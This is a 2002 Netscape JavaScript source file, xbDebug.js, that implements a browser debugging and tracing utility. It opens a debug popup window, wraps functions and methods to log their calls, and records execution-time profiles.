/* * $Log: xbDebug.js,v $ * Revision 1.1 2002/10/29 12:02:05 kuen * *** empty log message *** * * Revision 1.7 2002/07/22 14:19:42 bc6ix * fix license path * * Revision 1.6 2002/07/01 15:36:56 bc6ix * remove window.title in xbDebug.open and unused var p in xbDebugPersistToString * * Revision 1.5 2002/05/14 16:52:53 bc6ix * use CVS Log for revision history * *//* ***** BEGIN LICENSE BLOCK ***** * Licensed under Version: MPL 1.1/GPL 2.0/LGPL 2.1 * Full Terms at /lib/js/license/mpl-tri-license.txt * * Software distributed under the License is distributed on an "AS IS" basis, * WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License * for the specific language governing rights and limitations under the * License. * * The Original Code is Netscape code. * * The Initial Developer of the Original Code is * Netscape Corporation. * Portions created by the Initial Developer are Copyright (C) 2001 * the Initial Developer. All Rights Reserved. * * Contributor(s): Bob Clary <bclary@netscape.com> * * ***** END LICENSE BLOCK ***** *//*ChangeLog:2002-02-25: bclary - modified xbDebugTraceOject to make sure that original versions of wrapped functions were not rewrapped. This had caused an infinite loop in IE.2002-02-07: bclary - modified xbDebug.prototype.close to not null the debug window reference. This can cause problems with Internet Explorer if the page is refreshed. These issues will be addressed at a later date.*/function xbDebug(){ this.on = false; this.stack = new Array(); this.debugwindow = null; this.execprofile = new Object();}xbDebug.prototype.push = function (){ this.stack[this.stack.length] = this.on; this.on = true;}xbDebug.prototype.pop = function (){ this.on = this.stack[this.stack.length - 1]; --this.stack.length;}xbDebug.prototype.open = function (){ if (this.debugwindow && !this.debugwindow.closed) this.close(); this.debugwindow = window.open('about:blank', 'DEBUGWINDOW', 'height=400,width=600,resizable=yes,scrollbars=yes'); this.debugwindow.document.write('<html><head><title>xbDebug Window</title></head><body><h3>Javascript Debug Window</h3></body></html>'); this.debugwindow.focus();}xbDebug.prototype.close = function (){ if (!this.debugwindow) return; if (!this.debugwindow.closed) this.debugwindow.close(); // bc 2002-02-07, other windows may still hold a reference to this: this.debugwindow = null;}xbDebug.prototype.dump = function (msg){ if (!this.on) return; if (!this.debugwindow || this.debugwindow.closed) this.open(); this.debugwindow.document.write(msg + '<br>'); return;}var xbDEBUG = new xbDebug();window.onunload = function () { xbDEBUG.close(); }function xbDebugGetFunctionName(funcref){ if (!funcref) { return ''; } if (funcref.name) return funcref.name; var name = funcref + ''; name = name.substring(name.indexOf(' ') + 1, name.indexOf('(')); funcref.name = name; if (!name) alert('name not defined'); return name;}// emulate functionref.apply for IE mac and IE win < 5.5function xbDebugApplyFunction(funcname, funcref, thisref, argumentsref){ var rv; if (!funcref) { alert('xbDebugApplyFunction: funcref is null'); } if (typeof(funcref.apply) != 'undefined') return funcref.apply(thisref, argumentsref); var applyexpr = 'thisref.xbDebug_orig_' + funcname + '('; var i; for (i = 0; i < argumentsref.length; i++) { applyexpr += 'argumentsref[' + i + '],'; } if (argumentsref.length > 0) { applyexpr = applyexpr.substring(0, applyexpr.length - 1); } applyexpr += ')'; return eval(applyexpr);}function xbDebugCreateFunctionWrapper(scopename, funcname, precall, postcall){ var wrappedfunc; var scopeobject = eval(scopename); var funcref = scopeobject[funcname]; scopeobject['xbDebug_orig_' + funcname] = funcref; wrappedfunc = function () { var rv; precall(scopename, funcname, arguments); rv = xbDebugApplyFunction(funcname, funcref, scopeobject, arguments); postcall(scopename, funcname, arguments, rv); return rv; }; if (typeof(funcref.constructor) != 'undefined') wrappedfunc.constructor = funcref.constuctor; if (typeof(funcref.prototype) != 'undefined') wrappedfunc.prototype = funcref.prototype; scopeobject[funcname] = wrappedfunc;}function xbDebugCreateMethodWrapper(contextname, classname, methodname, precall, postcall){ var context = eval(contextname); var methodref = context[classname].prototype[methodname]; context[classname].prototype['xbDebug_orig_' + methodname] = methodref; var wrappedmethod = function () { var rv; // eval 'this' at method run time to pick up reference to the object's instance var thisref = eval('this'); // eval 'arguments' at method run time to pick up method's arguments var argsref = arguments; precall(contextname + '.' + classname, methodname, argsref); rv = xbDebugApplyFunction(methodname, methodref, thisref, argsref); postcall(contextname + '.' + classname, methodname, argsref, rv); return rv; }; return wrappedmethod;}function xbDebugPersistToString(obj){ var s = ''; if (obj == null) return 'null'; switch(typeof(obj)) { case 'number': return obj; case 'string': return '"' + obj + '"'; case 'undefined': return 'undefined'; case 'boolean': return obj + ''; } if (obj.constructor) return '[' + xbDebugGetFunctionName(obj.constructor) + ']'; return null;}function xbDebugTraceBefore(scopename, funcname, funcarguments) { var i; var s = ''; var execprofile = xbDEBUG.execprofile[scopename + '.' + funcname]; if (!execprofile) execprofile = xbDEBUG.execprofile[scopename + '.' + funcname] = { started: 0, time: 0, count: 0 }; for (i = 0; i < funcarguments.length; i++) { s += xbDebugPersistToString(funcarguments[i]); if (i < funcarguments.length - 1) s += ', '; } xbDEBUG.dump('enter ' + scopename + '.' + funcname + '(' + s + ')'); execprofile.started = (new Date()).getTime();}function xbDebugTraceAfter(scopename, funcname, funcarguments, rv) { var i; var s = ''; var execprofile = xbDEBUG.execprofile[scopename + '.' + funcname]; if (!execprofile) xbDEBUG.dump('xbDebugTraceAfter: execprofile not created for ' + scopename + '.' + funcname); else if (execprofile.started == 0) xbDEBUG.dump('xbDebugTraceAfter: execprofile.started == 0 for ' + scopename + '.' + funcname); else { execprofile.time += (new Date()).getTime() - execprofile.started; execprofile.count++; execprofile.started = 0; } for (i = 0; i < funcarguments.length; i++) { s += xbDebugPersistToString(funcarguments[i]); if (i < funcarguments.length - 1) s += ', '; } xbDEBUG.dump('exit ' + scopename + '.' + funcname + '(' + s + ')==' + xbDebugPersistToString(rv));}function xbDebugTraceFunction(scopename, funcname){ xbDebugCreateFunctionWrapper(scopename, funcname, xbDebugTraceBefore, xbDebugTraceAfter);}function xbDebugTraceObject(contextname, classname){ var classref = eval(contextname + '.' + classname); var p; var sp; if (!classref || !classref.prototype) return; for (p in classref.prototype) { sp = p + ''; if (typeof(classref.prototype[sp]) == 'function' && (sp).indexOf('xbDebug_orig') == -1) { classref.prototype[sp] = xbDebugCreateMethodWrapper(contextname, classname, sp, xbDebugTraceBefore, xbDebugTraceAfter); } }}function xbDebugDumpProfile(){ var p; var execprofile; var avg; for (p in xbDEBUG.execprofile) { execprofile = xbDEBUG.execprofile[p]; avg = Math.round ( 100 * execprofile.time/execprofile.count) /100; xbDEBUG.dump('Execution profile ' + p + ' called ' + execprofile.count + ' times. Total time=' + execprofile.time + 'ms. Avg Time=' + avg + 'ms.'); }}